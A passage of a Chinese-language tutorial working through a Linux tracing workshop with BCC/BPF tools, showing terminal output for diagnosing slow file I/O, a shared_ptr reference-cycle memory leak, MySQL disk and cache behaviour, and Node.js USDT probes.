COUNT EVENT
14400 filename = /etc/tracing-server-example.conf
^Croot@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'r:c:open():int:$retval'
[14:13:28]
r:c:open():int:$retval
COUNT EVENT
14451 $retval = -1
[14:13:29]
r:c:open():int:$retval
COUNT EVENT
14441 $retval = -1
^Croot@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
<h2 id="4"> 4. Using BPF Tools: Slow File I/O </h2>
<p>这个实验会跟踪IO latency比较大的情况。</p>
<p>首先编译并允许实验程序。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>假设你知道了logger程序的延迟会偶尔比较大(所以让你来解决这个问题:))。先怀疑是因为存在slow IO操作导致延迟大。使用biolatency看看:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 1
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 24 |********* |
1024 -> 2047 : 98 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 26 |********** |
1024 -> 2047 : 102 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 4 |* |
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 20 |******** |
1024 -> 2047 : 93 |****************************************|
2048 -> 4095 : 8 |*** |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
root@ubuntu1604:/usr/share/bcc/tools#
</code></pre></div></div>
<p>从上面可以看到大部分的IO操作都很快,但是也有一些IO操作比较耗时。使用biosnoop看看,可以看到有一些logger的IO操作明显比较大。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3230184 4096 1.49
0.001188000 jbd2/vda1-8 173 vda W 1611120 8192 1.15
0.002201000 jbd2/vda1-8 173 vda W 1611136 4096 0.90
0.023616000 logger 2120 vda W 3230192 4096 1.22
0.024938000 jbd2/vda1-8 173 vda W 1611144 8192 1.29
0.026173000 jbd2/vda1-8 173 vda W 1611160 4096 1.13
0.047631000 logger 2120 vda W 3230192 4096 1.23
0.048968000 jbd2/vda1-8 173 vda W 1611168 8192 1.30
0.050024000 jbd2/vda1-8 173 vda W 1611184 4096 0.95
0.071440000 logger 2120 vda W 3230192 4096 1.20
0.072585000 jbd2/vda1-8 173 vda W 1611192 8192 1.11
0.073800000 jbd2/vda1-8 173 vda W 1611208 4096 1.09
0.090548000 logger 2121 vda W 3217408 1048576 9.84
0.091801000 jbd2/vda1-8 173 vda W 1611216 8192 1.16
0.093033000 jbd2/vda1-8 173 vda W 1611232 4096 1.13
</code></pre></div></div>
<p>单独看看logger进程,可以发现logger偶尔会有很慢的IO操作:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./biosnoop -p $(pidof logger)
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3235144 4096 1.15
0.001174000 jbd2/vda1-8 173 vda W 1609744 8192 1.10
0.002295000 jbd2/vda1-8 173 vda W 1609760 4096 1.01
0.023569000 logger 2120 vda W 3235144 4096 1.06
0.024656000 jbd2/vda1-8 173 vda W 1609768 8192 1.05
0.025822000 jbd2/vda1-8 173 vda W 1609784 4096 1.07
0.037940000 logger 2121 vda W 3217408 1048576 9.31
0.039198000 jbd2/vda1-8 173 vda W 1609792 8192 1.16
0.040218000 jbd2/vda1-8 173 vda W 1609808 4096 0.92
</code></pre></div></div>
<p>使用fileslower,可以看出来,logger延迟比较大的原因是写1M数据到log.data,超过了普通的1024字节。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./fileslower.py 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
0.027 logger 1182 W 1024 3.79 log.data
0.055 logger 1182 W 1024 8.35 log.data
0.079 logger 1182 W 1024 3.62 log.data
0.103 logger 1182 W 1024 3.81 log.data
0.126 logger 1182 W 1024 3.71 log.data
0.150 logger 1182 W 1024 3.67 log.data
0.174 logger 1182 W 1024 3.68 log.data
0.198 logger 1182 W 1024 3.97 log.data
0.219 logger 1183 W 1048576 13.95 flush.data
0.222 logger 1182 W 1024 3.78 log.data
0.245 logger 1182 W 1024 3.54 log.data
0.269 logger 1182 W 1024 3.55 log.data
0.293 logger 1182 W 1024 3.76 log.data
0.317 logger 1182 W 1024 3.89 log.data
0.341 logger 1182 W 1024 3.85 log.data
0.364 logger 1182 W 1024 3.49 log.data
0.389 logger 1182 W 1024 4.96 log.data
0.413 logger 1182 W 1024 3.90 log.data
0.431 logger 1183 W 1048576 12.00 flush.data
</code></pre></div></div>
<h2 id="5"> 5.Using BPF Tools: Chasing a Memory Leak</h2>
<p>该实验中,用BPF的工具memleak检查一个程序的内存泄漏。</p>
<p>编译程序之后运行,输入文件名,统计,使用htop可以看到wordcount的内存使用一直在增加。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> g++ -fno-omit-frame-pointer -std=c++11 -g wordcount.cc -o wordcount
</code></pre></div></div>
<p>使用memleak可以是否有内存泄漏。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools/old# ./memleak -p $(pidof wordcount)
</code></pre></div></div>
<p>memleak默认每隔5s会打印出已经分配了,但是没有free掉的内存。</p>
<p>[18:15:21] Top 10 stacks with outstanding allocations:
[18:15:36] Top 10 stacks with outstanding allocations:
34 bytes in 2 allocations from stack
[unknown]</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>35 bytes in 2 allocations from stack
[unknown]
[unknown]
64 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<input_reader, std::allocator<input_reader>>(std::_Sp_make_shared_tag, input_reader*, std::allocator<input_reader> const&)+0x59
std::__shared_ptr<input_reader, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x3c
std::shared_ptr<input_reader>::shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x28
std::shared_ptr<input_reader> std::allocate_shared<input_reader, std::allocator<input_reader>>(std::allocator<input_reader> const&)+0x37
std::shared_ptr<input_reader> std::make_shared<input_reader>()+0x3b
main+0x3b
__libc_start_main+0xf0
128 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, word_counter*, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x5f
std::__shared_ptr<word_counter, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x50
std::shared_ptr<word_counter>::shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x3c
std::shared_ptr<word_counter> std::allocate_shared<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x4b
_ZSt11make_sharedI12word_counterIRSt10shared_ptrI12input_readerEEES1_IT_EDpOT0_+0x51
main+0x4e
__libc_start_main+0xf0
1767 bytes in 97 allocations from stack
???
4194304 bytes in 1 allocations from stack
std::allocator_traits<std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::allocate(std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >&, unsigned long)+0x28
std::_Vector_base<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_allocate(unsigned long)+0x2a
void std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_emplace_back_aux<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x3e
std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::push_back(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x69
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x26
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move<false, false, std::input_iterator_tag>::__copy_m<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x52
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x7d
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a2<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xb6
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::copy<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xa8
word_counter::word_count[abi:cxx11]()+0xfc
</code></pre></div></div>
<p>我们看到最大的一块没有释放的内存是在word_counter::word_count函数调用copy时候,还有一个是main中的std::shared_ptr指向word_counter的指针也没有释放。这就很奇怪了,因为shared_ptr会在对象退出scope时候自动析构。这个时候看代码:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int main()
{
bool done = false;
while (!done)
{
auto reader = std::make_shared<input_reader>();
auto counter = std::make_shared<word_counter>(reader);
reader->set_counter(counter);
auto counts = counter->word_count();
done = counter->done();
for (auto const& wc : counts)
{
std::cout << wc.first << " " << wc.second << '\n';
}
}
return 0;
}
</code></pre></div></div>
<p>原因就明了了,reader和counter发生了循环引用, 这样input_reader和word_counter的析构函数都是没有办法自动执行的。</p>
<h2 id="6"> 6. Using BPF Tools: Database and Disk Stats and Stacks </h2>
<p>在这个实验中将会使用BCC的tool去观察磁盘应能以及数据的query性能。</p>
<h3>观察mysql的插入</h3>
<p>首先安装, 启动 mysql:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# apt install mysql-server
root@ubuntu1604:~/linux-tracing-workshop# systemctl start mysql
</code></pre></div></div>
<p>创建好一个database之后运行:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert
</code></pre></div></div>
<p>上述脚本会一直插入记录。</p>
<p>运行biotop会发现mysql一直比较忙:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biotop
10:13:46 loadavg: 1.56 0.62 0.34 1/141 7738
PID COMM D MAJ MIN DISK I/O Kbytes AVGms
173 jbd2/vda1-8 W 253 0 vda 30 180 1.15
7007 mysqld W 253 0 vda 13 52 1.13
6985 mysqld W 253 0 vda 1 16 4.84
6989 mysqld W 253 0 vda 1 16 1.39
</code></pre></div></div>
<p>查看单个io的具体细节:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 mysqld 7007 vda W 11881528 4096 1.07
0.001324000 jbd2/vda1-8 173 vda W 1594504 8192 1.29
0.003013000 jbd2/vda1-8 173 vda W 1594520 4096 1.59
0.004724000 mysqld 7007 vda W 11881528 4096 1.06
0.005880000 jbd2/vda1-8 173 vda W 1594528 8192 1.12
0.007384000 jbd2/vda1-8 173 vda W 1594544 4096 1.40
0.009750000 mysqld 7007 vda W 11881528 4096 1.75
0.011242000 jbd2/vda1-8 173 vda W 1594552 8192 1.46
0.012463000 jbd2/vda1-8 173 vda W 1594568 4096 1.09
0.014872000 mysqld 7007 vda W 11881528 4096 1.79
0.015912000 jbd2/vda1-8 173 vda W 1594576 8192 1.01
0.017167000 jbd2/vda1-8 173 vda W 1594592 4096 1.14
0.019677000 mysqld 7007 vda W 11881528 4096 1.84
0.021173000 jbd2/vda1-8 173 vda W 1594600 8192 1.46
0.022514000 jbd2/vda1-8 173 vda W 1594616 4096 1.24
0.024218000 mysqld 7007 vda W 11881528 4096 1.07
0.025966000 jbd2/vda1-8 173 vda W 1594624 8192 1.72
0.027062000 jbd2/vda1-8 173 vda W 1594640 4096 1.00
0.028742000 mysqld 7007 vda W 11881528 4096 1.02
0.029930000 jbd2/vda1-8 173 vda W 1594648 8192 1.15
0.031019000 jbd2/vda1-8 173 vda W 1594664 4096 0.98
0.032752000 mysqld 7007 vda W 11881528 4096 1.06
0.033856000 jbd2/vda1-8 173 vda W 1594672 8192 1.07
0.035294000 jbd2/vda1-8 173 vda W 1594688 4096 1.33
</code></pre></div></div>
<p>使用biolatency看看延迟分布:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 5
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 748 |************ |
1024 -> 2047 : 2425 |****************************************|
2048 -> 4095 : 74 |* |
4096 -> 8191 : 27 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 2 | |
32768 -> 65535 : 2 | |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 773 |************* |
1024 -> 2047 : 2370 |****************************************|
2048 -> 4095 : 78 |* |
4096 -> 8191 : 34 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 4 | |
32768 -> 65535 : 1 | |
</code></pre></div></div>
<p>我们看到有一些IO延迟确实比较大,看一下提交给IO的内核栈(我的ubuntu 1604运行错误,可能跟内核编译选型有关):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> stackcount -i 10 submit_bio
</code></pre></div></div>
<p>使用fileslower查看比较慢的操作:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./fileslower 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
5.901 rs:main Q:Reg 459 W 92 1.80 auth.log
6.479 mysqld 7007 W 1024 1.48 ib_logfile0
7.952 mysqld 7007 W 512 2.72 ib_logfile0
14.828 mysqld 7007 W 512 5.28 ib_logfile0
14.843 mysqld 7007 W 8704 2.41 ib_logfile0
19.573 mysqld 7007 W 512 2.84 ib_logfile0
36.177 mysqld 7007 W 512 2.98 ib_logfile0
44.049 mysqld 7007 W 512 1.32 ib_logfile0
45.975 mysqld 7007 W 512 2.69 ib_logfile0
45.992 mysqld 7007 W 512 5.47 ib_logfile0
63.595 mysqld 7007 W 512 1.29 ib_logfile0
</code></pre></div></div>
<p>使用filetop查看mysql在插入row时候的文件访问</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./filetop
Tracing... Output every 1 secs. Hit Ctrl-C to end
10:27:08 loadavg: 1.78 1.61 1.12 1/139 7844
TID COMM READS WRITES R_Kb W_Kb T FILE
7844 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7844 clear 1 0 0 0 R libtinfo.so.5.9
7844 clear 1 0 0 0 R libc-2.23.so
7844 filetop 3 0 0 0 R clear
7844 filetop 2 0 0 0 R ld-2.23.so
7843 filetop 1 0 0 0 R id
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 239 0 166 R ib_logfile0
10:27:09 loadavg: 1.78 1.61 1.12 1/139 7845
TID COMM READS WRITES R_Kb W_Kb T FILE
7845 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7845 clear 1 0 0 0 R libtinfo.so.5.9
7845 clear 1 0 0 0 R libc-2.23.so
7845 filetop 3 0 0 0 R clear
7845 filetop 2 0 0 0 R ld-2.23.so
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 243 0 168 R ib_logfile0
</code></pre></div></div>
<p>查看IO操作的中断对系统的影响:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./hardirqs 1
Tracing hard irq event time... Hit Ctrl-C to end.
HARDIRQ TOTAL_usecs
virtio1-input.0 161
virtio3-req.0 5684
HARDIRQ TOTAL_usecs
virtio0-input.0 2
virtio1-input.0 108
virtio3-req.0 5639
HARDIRQ TOTAL_usecs
virtio1-input.0 145
virtio3-req.0 5678
HARDIRQ TOTAL_usecs
virtio0-input.0 1
virtio1-input.0 134
virtio3-req.0 5891
HARDIRQ TOTAL_usecs
virtio1-input.0 116
virtio3-req.0 5869
</code></pre></div></div>
<h3>现在观察mysql的查询</h3>
<p>插入数据并select:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert_once
Inserting employees...
root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py select
Selecting employees...
</code></pre></div></div>
<p>使用biotop,biolatency, fileslower均没有看到有慢的IO操作,猜测是cache命中得比较好。</p>
<p>运行cachestat之后运行select:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
1124 0 0 100.0% 0.0% 64 1531
5 2 3 28.6% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
</code></pre></div></div>
<p>可以看到在某一段时间有读操作,但是之后就没有,可以猜想mysql在内部实现了自己的cache。</p>
<p>关闭系统cache,可以看到确实也没有发生很多read操作。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# echo 1 > /proc/sys/vm/drop_caches
root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 0 88
4 0 0 100.0% 0.0% 0 88
6 5 4 18.2% 18.2% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
3 0 0 100.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
</code></pre></div></div>
<h2 id="7"> 7. Using BPF Tools: Node and JVM USDT Probes </h2>
<h3> Node </h3>
<p>编译支持USDT的node, 之前要先按照systemtap-sdt-dev:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ git clone https://github.com/nodejs/node.git
$ cd node
$ git checkout v6.2.1 # or whatever version is currently stable
$ ./configure --prefix=/opt/node --with-dtrace
$ make -j 3
$ sudo make install
</code></pre></div></div>
<p>使用tplist显示node的USDT probe点:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node
/root/node/node node:gc__start
/root/node/node node:gc__done
/root/node/node node:net__server__connection
/root/node/node node:net__stream__end
/root/node/node node:http__server__response
/root/node/node node:http__client__response
/root/node/node node:http__client__request
/root/node/node node:http__server__request
</code></pre></div></div>
<p>将node运行起来可以查看更多的USDT probe:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -p $(pidof node)
/lib/x86_64-linux-gnu/libc-2.23.so libc:setjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp_target
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_free_list
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_sbrk_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_wait
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_retry
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_free
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_more
</code></pre></div></div>
<p>查看probe的详细信息:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node -vv '*server__request'
/root/node/node node:http__server__request [sema 0x1c0a034]
location #1 0x1045cf8
argument #1 8 unsigned bytes @ r14
argument #2 8 unsigned bytes @ ax
argument #3 8 unsigned bytes @ *(bp - 4344)
argument #4 4 signed bytes @ *(bp - 4348)
argument #5 8 unsigned bytes @ *(bp - 4304)
argument #6 8 unsigned bytes @ *(bp - 4312)
argument #7 4 signed bytes @ *(bp - 4352)
</code></pre></div></div>
<p>在node/src/node.stp文件中有每个参数的含义:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> probe node_http_server_request = process("node").mark("http__server__request")
{
remote = user_string($arg3);
port = $arg4;
method = user_string($arg5);
url = user_string($arg6);
fd = $arg7;
probestr = sprintf("%s(remote=%s, port=%d, method=%s, url=%s, fd=%d)",
$$name,
remote,
port,
method,
url,
fd);
}
</code></pre></div></div>
<p>开启server.js:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ~/node/node server.js
</code></pre></div></div>
<p>另一个终端开启trace:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
</code></pre></div></div>
<p>另一个终端发送请求,arg5分别表示method和url:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/node/src# curl localhost:8080
Hello, world!root@ubuntu1604:~/node/src# curl localhost:8080/index.html
Hello, world!root@ubuntu1604:~/node/src# curl 'localhost:8080/login?user=dave&pwd=123'
Hello, world!root@ubuntu1604:~/node/src#
</code></pre></div></div>
<p>从第二个终端可以看到输出:</p>
